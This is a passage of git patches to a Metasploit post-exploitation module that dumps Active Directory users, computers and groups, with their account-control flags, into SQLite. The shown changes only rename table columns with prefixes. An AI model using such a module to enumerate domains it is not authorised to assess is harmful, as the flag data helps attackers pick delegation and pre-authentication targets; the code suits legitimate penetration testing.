u_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, #This is a default account type that represents a typical user. - ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, + u_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, #This is a permit to trust account for a system domain that trusts other domains. - ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, + u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, #This is a computer account for a computer that is a member of this domain. - ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, + u_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, #This is a computer account for a system backup domain controller that is a member of this domain. - ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, + u_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, #The password for this account will never expire. - ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, + u_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, #This is an MNS logon account. - ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, + u_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, #The user must log on using a smart card. - ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, + u_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. #Any such service can impersonate a client requesting the service. - ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, + u_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, #The security context of the user will not be delegated to a service even if the service #account is set as trusted for Kerberos delegation. - ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, + u_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. - ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, + u_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, #This account does not require Kerberos pre-authentication for logon. - ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, + u_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, #The password has expired - ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, + u_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, #The account is enabled for delegation. This is a security-sensitive setting; accounts with #this option enabled should be strictly controlled. This setting enables a service running #under the account to assume a client identity and authenticate as that user to other remote #servers on the network. - ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1 + u_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1 } run_sqlite_query(db, 'ad_users', sql_param_user) @@ -240,73 +240,73 @@ class Metasploit3 < Msf::Post # (if you look at the objectClass for a computer account, it includes 'user') and, for efficiency, we should really store it all in one # table. However, the reality is that it will get annoying for users to have to remember to use the userAccountControl flags to work out whether # its a user or a computer and so, for convenience and ease of use, I have put them in completely separate tables. - sql_param_computer = { rid: computer_rid, - distinguishedName: comp[0][:value].to_s, - cn: comp[2][:value].to_s, - dNSHostName: comp[3][:value].to_s, - sAMAccountType: comp[4][:value].to_i, - sAMAccountName: comp[5][:value].to_s, - displayName: comp[6][:value].to_s, - logonCount: comp[7][:value].to_i, - userAccountControl: uac_int, - whenChanged: comp[9][:value].to_s, - whenCreated: comp[10][:value].to_s, - primaryGroupID: comp[11][:value].to_i, - badPwdCount: comp[12][:value].to_i, - operatingSystem: comp[13][:value].to_s, - operatingSystemServicePack: comp[14][:value].to_s, - operatingSystemVersion: comp[15][:value].to_s, - description: comp[16][:value].to_s, - comments: comp[17][:value].to_s, + sql_param_computer = { c_rid: computer_rid, + c_distinguishedName: comp[0][:value].to_s, + c_cn: comp[2][:value].to_s, + c_dNSHostName: comp[3][:value].to_s, + c_sAMAccountType: comp[4][:value].to_i, + c_sAMAccountName: comp[5][:value].to_s, + c_displayName: comp[6][:value].to_s, + c_logonCount: comp[7][:value].to_i, + c_userAccountControl: uac_int, + c_whenChanged: comp[9][:value].to_s, + c_whenCreated: comp[10][:value].to_s, + c_primaryGroupID: comp[11][:value].to_i, + c_badPwdCount: comp[12][:value].to_i, + c_operatingSystem: comp[13][:value].to_s, + c_operatingSystemServicePack: comp[14][:value].to_s, + c_operatingSystemVersion: comp[15][:value].to_s, + c_description: comp[16][:value].to_s, + c_comments: comp[17][:value].to_s, #The login script is executed - ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, + c_ADS_UF_SCRIPT: (uac_int & 0x00000001).zero? ? 0 : 1, #The user account is disabled. - ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, + c_ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002).zero? ? 0 : 1, #The home directory is required. - ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, + c_ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008).zero? ? 0 : 1, #The account is currently locked out. - ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, + c_ADS_UF_LOCKOUT: (uac_int & 0x00000010).zero? ? 0 : 1, #No password is required. - ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, + c_ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020).zero? ? 0 : 1, #The user cannot change the password. - ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, + c_ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040).zero? ? 0 : 1, #The user can send an encrypted password. - ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, + c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080).zero? ? 0 : 1, #This is an account for users whose primary account is in another domain. This account #provides user access to this domain, but not to any domain that trusts this domain. #Also known as a local user account. - ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, + c_ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100).zero? ? 0 : 1, #This is a default account type that represents a typical user. - ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, + c_ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200).zero? ? 0 : 1, #This is a permit to trust account for a system domain that trusts other domains. - ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, + c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800).zero? ? 0 : 1, #This is a computer account for a computer that is a member of this domain. - ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, + c_ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000).zero? ? 0 : 1, #This is a computer account for a system backup domain controller that is a member of this domain. - ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, + c_ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000).zero? ? 0 : 1, #The password for this account will never expire. - ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, + c_ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000).zero? ? 0 : 1, #This is an MNS logon account. - ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, + c_ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000).zero? ? 0 : 1, #The user must log on using a smart card. - ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, + c_ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000).zero? ? 0 : 1, #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. #Any such service can impersonate a client requesting the service. - ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, + c_ADS_UF_TRUSTED_FOR_DELEGATION: (uac_int & 0x00080000).zero? ? 0 : 1, #The security context of the user will not be delegated to a service even if the service #account is set as trusted for Kerberos delegation. - ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, + c_ADS_UF_NOT_DELEGATED: (uac_int & 0x00100000).zero? ? 0 : 1, #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. - ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, + c_ADS_UF_USE_DES_KEY_ONLY: (uac_int & 0x00200000).zero? ? 0 : 1, #This account does not require Kerberos pre-authentication for logon. - ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, + c_ADS_UF_DONT_REQUIRE_PREAUTH: (uac_int & 0x00400000).zero? ? 0 : 1, #The password has expired - ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, + c_ADS_UF_PASSWORD_EXPIRED: (uac_int & 0x00800000).zero? ? 0 : 1, #The account is enabled for delegation. This is a security-sensitive setting; accounts with #this option enabled should be strictly controlled. This setting enables a service running #under the account to assume a client identity and authenticate as that user to other remote #servers on the network. - ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1 + c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (uac_int & 0x01000000).zero? ? 0 : 1 } run_sqlite_query(db, 'ad_computers', sql_param_computer) print_line "Computer [#{sql_param_computer[:cn]}][#{sql_param_computer[:dNSHostName]}][#{sql_param_computer[:rid]}]" if datastore['SHOW_USERGROUPS'] @@ -343,111 +343,122 @@ class Metasploit3 < Msf::Post # Create the table for the AD Computers db.execute('DROP TABLE IF EXISTS ad_computers') sql_table_computers = 'CREATE TABLE ad_computers ('\ - 'rid INTEGER PRIMARY KEY NOT NULL,'\ - 'distinguishedName TEXT UNIQUE NOT NULL,'\ - 'cn TEXT,'\ - 'sAMAccountType INTEGER,'\ - 'sAMAccountName TEXT UNIQUE NOT NULL,'\ - 'dNSHostName TEXT,'\ - 'displayName TEXT,'\ - 'logonCount INTEGER,'\ - 'userAccountControl INTEGER,'\ - 'primaryGroupID INTEGER,'\ - 'badPwdCount INTEGER,'\ - 'description TEXT,'\ - 'comments TEXT,'\ - 'operatingSystem TEXT,'\ - 'operatingSystemServicePack TEXT,'\ - 'operatingSystemVersion TEXT,'\ - 'whenChanged TEXT,'\ - 'whenCreated TEXT,'\ - 'ADS_UF_SCRIPT INTEGER,'\ - 'ADS_UF_ACCOUNTDISABLE INTEGER,'\ - 'ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ - 'ADS_UF_LOCKOUT INTEGER,'\ - 'ADS_UF_PASSWD_NOTREQD INTEGER,'\ - 'ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ - 'ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ - 'ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ - 'ADS_UF_NORMAL_ACCOUNT INTEGER,'\ - 'ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ - 'ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ - 'ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ - 'ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ - 'ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ - 'ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ - 'ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ - 'ADS_UF_NOT_DELEGATED INTEGER,'\ - 'ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ - 'ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ - 'ADS_UF_PASSWORD_EXPIRED INTEGER,'\ - 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER)' + 'c_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'c_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'c_cn TEXT,'\ + 'c_sAMAccountType INTEGER,'\ + 'c_sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'c_dNSHostName TEXT,'\ + 'c_displayName TEXT,'\ + 'c_logonCount INTEGER,'\ + 'c_userAccountControl INTEGER,'\ + 'c_primaryGroupID INTEGER,'\ + 'c_badPwdCount INTEGER,'\ + 'c_description TEXT,'\ + 'c_comments TEXT,'\ + 'c_operatingSystem TEXT,'\ + 'c_operatingSystemServicePack TEXT,'\ + 'c_operatingSystemVersion TEXT,'\ + 'c_whenChanged TEXT,'\ + 'c_whenCreated TEXT,'\ + 'c_ADS_UF_SCRIPT INTEGER,'\ + 'c_ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'c_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'c_ADS_UF_LOCKOUT INTEGER,'\ + 'c_ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'c_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'c_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'c_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 'c_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'c_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'c_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'c_ADS_UF_NOT_DELEGATED INTEGER,'\ + 'c_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'c_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'c_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER)' db.execute(sql_table_computers) # Create the table for the AD Groups db.execute('DROP TABLE IF EXISTS ad_groups') sql_table_group = 'CREATE TABLE ad_groups ('\ - 'rid INTEGER PRIMARY KEY NOT NULL,'\ - 'distinguishedName TEXT UNIQUE NOT NULL,'\ - 'sAMAccountType INTEGER,'\ - 'sAMAccountName TEXT UNIQUE NOT NULL,'\ - 'groupType INTEGER,'\ - 'adminCount INTEGER,'\ - 'description TEXT,'\ - 'comments TEXT,'\ - 'whenChanged TEXT,'\ - 'whenCreated TEXT,'\ - 'GT_GROUP_CREATED_BY_SYSTEM INTEGER,'\ - 'GT_GROUP_SCOPE_GLOBAL INTEGER,'\ - 'GT_GROUP_SCOPE_LOCAL INTEGER,'\ - 'GT_GROUP_SCOPE_UNIVERSAL INTEGER,'\ - 'GT_GROUP_SAM_APP_BASIC INTEGER,'\ - 'GT_GROUP_SAM_APP_QUERY INTEGER,'\ - 'GT_GROUP_SECURITY INTEGER,'\ - 'GT_GROUP_DISTRIBUTION INTEGER)' + 'c_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'c_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'c_sAMAccountType INTEGER,'\ + 'c_sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'c_groupType INTEGER,'\ + 'c_adminCount INTEGER,'\ + 'c_description TEXT,'\ + 'c_comments TEXT,'\ + 'c_whenChanged TEXT,'\ + 'c_whenCreated TEXT,'\ + 'c_GT_GROUP_CREATED_BY_SYSTEM INTEGER,'\ + 'c_GT_GROUP_SCOPE_GLOBAL INTEGER,'\ + 'c_GT_GROUP_SCOPE_LOCAL INTEGER,'\ + 'c_GT_GROUP_SCOPE_UNIVERSAL INTEGER,'\ + 'c_GT_GROUP_SAM_APP_BASIC INTEGER,'\ + 'c_GT_GROUP_SAM_APP_QUERY INTEGER,'\ + 'c_GT_GROUP_SECURITY INTEGER,'\ + 'c_GT_GROUP_DISTRIBUTION INTEGER)' db.execute(sql_table_group) # Create the table for the AD Users db.execute('DROP TABLE IF EXISTS ad_users') sql_table_users = 'CREATE TABLE ad_users ('\ - 'rid INTEGER PRIMARY KEY NOT NULL,'\ - 'distinguishedName TEXT UNIQUE NOT NULL,'\ - 'description TEXT,'\ - 'displayName TEXT,'\ - 'sAMAccountType INTEGER,'\ - 'sAMAccountName TEXT,'\ - 'logonCount INTEGER,'\ - 'userAccountControl INTEGER,'\ - 'primaryGroupID INTEGER,'\ - 'accountExpires INTEGER,'\ - 'adminCount INTEGER,'\ - 'badPwdCount INTEGER,'\ - 'userPrincipalName TEXT UNIQUE,'\ - 'comments TEXT,'\ - 'title TEXT,'\ - 'whenCreated TEXT,'\ - 'whenChanged TEXT,'\ - 'ADS_UF_SCRIPT INTEGER,'\ - 'ADS_UF_ACCOUNTDISABLE INTEGER,'\ - 'ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ - 'ADS_UF_LOCKOUT INTEGER,'\ - 'ADS_UF_PASSWD_NOTREQD INTEGER,'\ - 'ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ - 'ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ - 'ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ - 'ADS_UF_NORMAL_ACCOUNT INTEGER,'\ - 'ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ - 'ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ - 'ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ - 'ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ - 'ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ - 'ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ - 'ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ - 'ADS_UF_NOT_DELEGATED INTEGER,'\ - 'ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ - 'ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ - 'ADS_UF_PASSWORD_EXPIRED INTEGER,'\ - 'ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER)' + 'c_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'c_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'c_description TEXT,'\ + 'c_displayName TEXT,'\ + 'c_sAMAccountType INTEGER,'\ + 'c_sAMAccountName TEXT,'\ + 'c_logonCount INTEGER,'\ + 'c_userAccountControl INTEGER,'\ + 'c_primaryGroupID INTEGER,'\ + 'c_accountExpires INTEGER,'\ + 'c_adminCount INTEGER,'\ + 'c_badPwdCount INTEGER,'\ + 'c_userPrincipalName TEXT UNIQUE,'\ + 'c_comments TEXT,'\ + 'c_title TEXT,'\ + 'c_whenCreated TEXT,'\ + 'c_whenChanged TEXT,'\ + 'c_ADS_UF_SCRIPT INTEGER,'\ + 'c_ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'c_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'c_ADS_UF_LOCKOUT INTEGER,'\ + 'c_ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'c_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'c_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'c_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ + 'c_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ + 'c_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ + 'c_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ + 'c_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ + 'c_ADS_UF_NOT_DELEGATED INTEGER,'\ + 'c_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ + 'c_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ + 'c_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ + 'c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER,'\ + 'c_SAM_DOMAIN_OBJECT INTEGER,'\ + 'c_SAM_GROUP_OBJECT INTEGER,'\ + 'c_SAM_NON_SECURITY_GROUP_OBJECT INTEGER,'\ + 'c_SAM_ALIAS_OBJECT INTEGER,'\ + 'c_SAM_NON_SECURITY_ALIAS_OBJECT INTEGER,'\ + 'c_SAM_NORMAL_USER_ACCOUNT INTEGER,'\ + 'c_SAM_MACHINE_ACCOUNT INTEGER,'\ + 'c_SAM_TRUST_ACCOUNT INTEGER,'\ + 'c_SAM_APP_BASIC_GROUP INTEGER,'\ + 'c_SAM_APP_QUERY_GROUP INTEGER,'\ + 'c_SAM_ACCOUNT_TYPE_MAX INTEGER)' db.execute(sql_table_users) # Create the table for the mapping between the two (membership) From 5f5a297324eb31cc0a7314efb8b40a93bf47b190 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Sun, 20 Dec 2015 01:30:24 +0000 Subject: [PATCH 115/686] Adding u_, g_ and c_ parameters to the tables directly avoids most of the views --- .../windows/gather/ad_groupusers_to_sql.rb | 261 ++++++------------ 1 file changed, 77 insertions(+), 184 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index aa86792a0f..5fc151987d 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -361,72 +361,6 @@ class Metasploit3 < Msf::Post 'c_operatingSystemVersion TEXT,'\ 'c_whenChanged TEXT,'\ 'c_whenCreated TEXT,'\ - 'c_ADS_UF_SCRIPT INTEGER,'\ - 'c_ADS_UF_ACCOUNTDISABLE INTEGER,'\ - 'c_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ - 'c_ADS_UF_LOCKOUT INTEGER,'\ - 'c_ADS_UF_PASSWD_NOTREQD INTEGER,'\ - 'c_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ - 'c_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ - 'c_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ - 'c_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ - 'c_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ - 'c_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ - 'c_ADS_UF_SERVER_TRUST_ACCOUNT INTEGER,'\ - 'c_ADS_UF_DONT_EXPIRE_PASSWD INTEGER,'\ - 'c_ADS_UF_MNS_LOGON_ACCOUNT INTEGER,'\ - 'c_ADS_UF_SMARTCARD_REQUIRED INTEGER,'\ - 'c_ADS_UF_TRUSTED_FOR_DELEGATION INTEGER,'\ - 'c_ADS_UF_NOT_DELEGATED INTEGER,'\ - 'c_ADS_UF_USE_DES_KEY_ONLY INTEGER,'\ - 'c_ADS_UF_DONT_REQUIRE_PREAUTH INTEGER,'\ - 'c_ADS_UF_PASSWORD_EXPIRED INTEGER,'\ - 'c_ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION INTEGER)' - db.execute(sql_table_computers) - - # Create the table for the AD Groups - db.execute('DROP TABLE IF EXISTS ad_groups') - sql_table_group = 'CREATE TABLE ad_groups ('\ - 'c_rid INTEGER PRIMARY KEY NOT NULL,'\ - 'c_distinguishedName TEXT UNIQUE NOT NULL,'\ - 'c_sAMAccountType INTEGER,'\ - 'c_sAMAccountName TEXT UNIQUE NOT NULL,'\ - 'c_groupType INTEGER,'\ - 'c_adminCount INTEGER,'\ - 'c_description TEXT,'\ - 'c_comments TEXT,'\ - 'c_whenChanged TEXT,'\ - 'c_whenCreated TEXT,'\ - 'c_GT_GROUP_CREATED_BY_SYSTEM INTEGER,'\ - 'c_GT_GROUP_SCOPE_GLOBAL INTEGER,'\ - 'c_GT_GROUP_SCOPE_LOCAL INTEGER,'\ - 'c_GT_GROUP_SCOPE_UNIVERSAL INTEGER,'\ - 'c_GT_GROUP_SAM_APP_BASIC INTEGER,'\ - 'c_GT_GROUP_SAM_APP_QUERY INTEGER,'\ - 'c_GT_GROUP_SECURITY INTEGER,'\ - 'c_GT_GROUP_DISTRIBUTION INTEGER)' - db.execute(sql_table_group) - - # Create the table for the AD Users - db.execute('DROP TABLE IF EXISTS ad_users') - sql_table_users = 'CREATE TABLE ad_users ('\ - 'c_rid INTEGER PRIMARY KEY NOT NULL,'\ - 'c_distinguishedName TEXT UNIQUE NOT NULL,'\ - 'c_description TEXT,'\ - 'c_displayName TEXT,'\ - 'c_sAMAccountType INTEGER,'\ - 'c_sAMAccountName TEXT,'\ - 'c_logonCount INTEGER,'\ - 'c_userAccountControl INTEGER,'\ - 'c_primaryGroupID INTEGER,'\ - 'c_accountExpires INTEGER,'\ - 'c_adminCount INTEGER,'\ - 'c_badPwdCount INTEGER,'\ - 'c_userPrincipalName TEXT UNIQUE,'\ - 'c_comments TEXT,'\ - 'c_title TEXT,'\ - 'c_whenCreated TEXT,'\ - 'c_whenChanged TEXT,'\ 'c_ADS_UF_SCRIPT INTEGER,'\ 'c_ADS_UF_ACCOUNTDISABLE INTEGER,'\ 'c_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ @@ -459,6 +393,83 @@ class Metasploit3 < Msf::Post 'c_SAM_APP_BASIC_GROUP INTEGER,'\ 'c_SAM_APP_QUERY_GROUP INTEGER,'\ 'c_SAM_ACCOUNT_TYPE_MAX INTEGER)' + db.execute(sql_table_computers) + + # Create the table for the AD Groups + db.execute('DROP TABLE IF EXISTS ad_groups') + sql_table_group = 'CREATE TABLE ad_groups ('\ + 'g_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'g_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'g_sAMAccountType INTEGER,'\ + 'g_sAMAccountName TEXT UNIQUE NOT NULL,'\ + 'g_groupType INTEGER,'\ + 'g_adminCount INTEGER,'\ + 'g_description TEXT,'\ + 'g_comments TEXT,'\ + 'g_whenChanged TEXT,'\ + 'g_whenCreated TEXT,'\ + 'g_GT_GROUP_CREATED_BY_SYSTEM INTEGER,'\ + 'g_GT_GROUP_SCOPE_GLOBAL INTEGER,'\ + 'g_GT_GROUP_SCOPE_LOCAL INTEGER,'\ + 'g_GT_GROUP_SCOPE_UNIVERSAL INTEGER,'\ + 'g_GT_GROUP_SAM_APP_BASIC INTEGER,'\ + 'g_GT_GROUP_SAM_APP_QUERY INTEGER,'\ + 'g_GT_GROUP_SECURITY INTEGER,'\ + 'g_GT_GROUP_DISTRIBUTION INTEGER)' + db.execute(sql_table_group) + + # Create the table for the AD Users + db.execute('DROP TABLE IF EXISTS ad_users') + sql_table_users = 'CREATE TABLE ad_users ('\ + 'u_rid INTEGER PRIMARY KEY NOT NULL,'\ + 'u_distinguishedName TEXT UNIQUE NOT NULL,'\ + 'u_description TEXT,'\ + 'u_displayName TEXT,'\ + 'u_sAMAccountType INTEGER,'\ + 'u_sAMAccountName TEXT,'\ + 'u_logonCount INTEGER,'\ + 'u_userAccountControl INTEGER,'\ + 'u_primaryGroupID INTEGER,'\ + 'u_accountExpires INTEGER,'\ + 'u_adminCount INTEGER,'\ + 'u_badPwdCount INTEGER,'\ + 'u_userPrincipalName TEXT UNIQUE,'\ + 'u_comments TEXT,'\ + 'u_title TEXT,'\ + 'u_whenCreated TEXT,'\ + 'u_whenChanged TEXT,'\ + 'u_ADS_UF_SCRIPT INTEGER,'\ + 'u_ADS_UF_ACCOUNTDISABLE INTEGER,'\ + 'u_ADS_UF_HOMEDIR_REQUIRED INTEGER,'\ + 'u_ADS_UF_LOCKOUT INTEGER,'\ + 'u_ADS_UF_PASSWD_NOTREQD INTEGER,'\ + 'u_ADS_UF_PASSWD_CANT_CHANGE INTEGER,'\ + 'u_ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED INTEGER,'\ + 'u_ADS_UF_TEMP_DUPLICATE_ACCOUNT INTEGER,'\ + 'u_ADS_UF_NORMAL_ACCOUNT INTEGER,'\ + 'u_ADS_UF_INTERDOMAIN_TRUST_ACCOUNT INTEGER,'\ + 'u_ADS_UF_WORKSTATION_TRUST_ACCOUNT INTEGER,'\ + 